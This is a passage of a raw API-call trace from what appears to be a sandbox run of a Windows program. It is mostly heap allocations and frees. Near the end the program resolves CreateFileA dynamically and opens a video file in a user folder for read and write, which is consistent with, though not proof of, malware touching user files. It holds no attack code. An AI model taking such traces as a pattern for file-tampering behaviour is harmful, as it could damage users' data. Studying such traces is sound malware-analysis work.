RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0199.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0199.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0199.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0199.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0199.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0199.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0199.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0199.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0199.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0199.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0199.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0199.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0199.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0199.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0199.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0199.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0199.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0199.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0199.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0199.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0199.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0199.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0199.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0199.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0199.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0199.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0199.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0199.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0199.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0199.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0199.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0199.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0199.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0199.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0199.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0199.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0199.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0199.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0199.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0199.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0199.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0199.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0199.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0199.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0199.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0199.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0199.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0199.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0199.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0199.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0199.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0199.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0199.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0199.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0199.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0199.325] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0199.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0199.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0199.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0199.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0199.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0199.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0199.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0199.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0199.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0199.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0199.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0199.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0199.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0199.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0199.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0199.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0199.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0199.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0199.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0199.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0199.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0199.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0199.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0199.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0199.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0199.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0199.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0199.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0199.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0199.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0199.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0199.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0199.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0199.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0199.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0199.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0199.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0199.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0199.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0199.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0199.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0199.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0199.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0199.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0199.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0199.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0199.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0199.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0199.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0199.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0199.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0199.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0199.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0199.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0199.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0199.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0199.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0199.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0199.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0199.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0199.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0199.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0199.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0199.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0199.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0199.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0199.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0199.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0199.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0199.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0199.328] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0199.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0199.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0199.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9b9a60 [0199.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9b9a60, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0199.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0199.328] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0199.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0199.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0199.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0199.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0199.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0199.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0199.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0199.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a60 [0199.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9b9a60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0199.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0199.329] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0199.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0199.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0199.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0199.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0199.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0199.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0199.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0199.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0199.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0199.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0199.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0199.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0199.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0199.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4", cchWideChar=74, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 74 [0199.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4a) returned 0x923b28 [0199.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4", cchWideChar=74, lpMultiByteStr=0x923b28, cbMultiByte=74, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4", lpUsedDefaultChar=0x0) returned 74 [0199.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0199.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0199.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0199.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0199.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0199.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0199.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0199.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0199.330] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\guurkoggeovl1ts9ut.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0199.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0199.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0199.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0199.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0199.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0199.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0199.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0199.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0199.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0199.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0199.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0199.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0199.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0199.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=74, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0199.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x94) returned 0x907778 [0199.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=74, lpWideCharStr=0x907778, cchWideChar=74 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4") returned 74 [0199.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0199.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9100 [0199.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0199.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0199.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0199.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0199.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0199.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0199.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0199.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0199.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0199.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0199.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0199.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0199.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0199.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0199.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0199.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0199.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0199.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0199.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0199.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0199.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0199.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0199.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0199.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0199.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0199.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0199.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0199.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0199.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0199.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0199.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0199.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0199.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0199.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) 